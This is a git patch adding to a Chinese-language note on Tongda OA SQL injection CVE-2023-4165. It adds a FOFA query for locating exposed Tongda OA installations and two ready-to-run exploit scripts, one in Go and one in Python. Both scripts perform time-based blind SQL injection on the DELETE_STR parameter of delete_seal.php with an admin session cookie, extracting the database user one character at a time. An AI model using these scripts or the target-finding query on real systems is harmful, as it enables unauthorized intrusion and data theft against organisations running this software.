From 129e5dcf627548119b2bf9bf2b4bb23937eb72d7 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 4 Nov 2023 22:27:01 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E9=80=9A=E8=BE=BEOA=20sql=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E=20CVE-2023-4165.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 通达OA sql注入漏洞 CVE-2023-4165.md | 111 ++++++++++++++++++++++++++++
 1 file changed, 111 insertions(+)
diff --git a/通达OA sql注入漏洞 CVE-2023-4165.md b/通达OA sql注入漏洞 CVE-2023-4165.md
index d667f82..d73a0d8 100644
--- a/通达OA sql注入漏洞 CVE-2023-4165.md
+++ b/通达OA sql注入漏洞 CVE-2023-4165.md
@@ -15,3 +15,114 @@ Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ``` +## FOFA语法: +``` +app="TDXK-通达OA" && icon_hash="-759108386" + +``` +## 利用脚本 +### go +```go +package main + +import ( + "fmt" + "net/http" + "strings" + "time" +) +// 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞 +func main() { + // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1 general/system/seal_manage/dianju/delete_log.php + url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php" // 目标网站的URL + delay := 2 // 延迟时间,单位为秒 + cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值 + + characters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()+-" // 可能的字符集 + + result := "" + for i := 1; i <= 30; i++ { // 假设字符的最大长度为30 + found := false + for _, char := range characters { + payload := fmt.Sprintf("1) and (substr(USER(),%d,1))=char(%d) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1", i, int(char)) // 构造payload + //print(payload, "n") + req, err := http.NewRequest("GET", url, nil) + if err != nil { + fmt.Println("创建请求失败:", err) + return + } + + // 使用分号分隔的每个Cookie项 + cookieItems := strings.Split(cookieValue, "; ") + for _, item := range cookieItems { + itemSplit := strings.SplitN(item, "=", 2) // 按照等号(=)分隔键值对 + if len(itemSplit) == 2 { + cookie := &http.Cookie{ + Name: itemSplit[0], + Value: itemSplit[1], + } + req.AddCookie(cookie) + } + } + + req.URL.RawQuery = "DELETE_STR=" + payload //构建请求,其DELETE_STR是本次的注入参数 + + startTime := time.Now() + resp, err := http.DefaultClient.Do(req) + if err != nil { + fmt.Println("发送请求失败:", err) + return + } + defer resp.Body.Close() + + endTime := time.Now() + responseTime := endTime.Sub(startTime) + + if responseTime >= time.Duration(delay)*time.Second { + result += string(char) + fmt.Println("", result) + found = true + break + } + } + + if !found { + 
break + } + } + + fmt.Println("Database: " + result) +} +``` + +### Python +```python +import requests +import time + +headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=baae495a"} + +characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-" + +url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=" + +result = "" + +for i in range(1,31): + found = False + for c in characters: + payload = f"1) and (substr(USER(),{i},1))=char({ord(c)}) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1" + start_time = time.time() + res = requests.get(url=url+payload,headers=headers) + end_time = time.time() + elapsed_time = end_time - start_time + + if elapsed_time >= 2: + result +=c + print(result) + found = True + if not found: + break + +print("Databas:",result) +```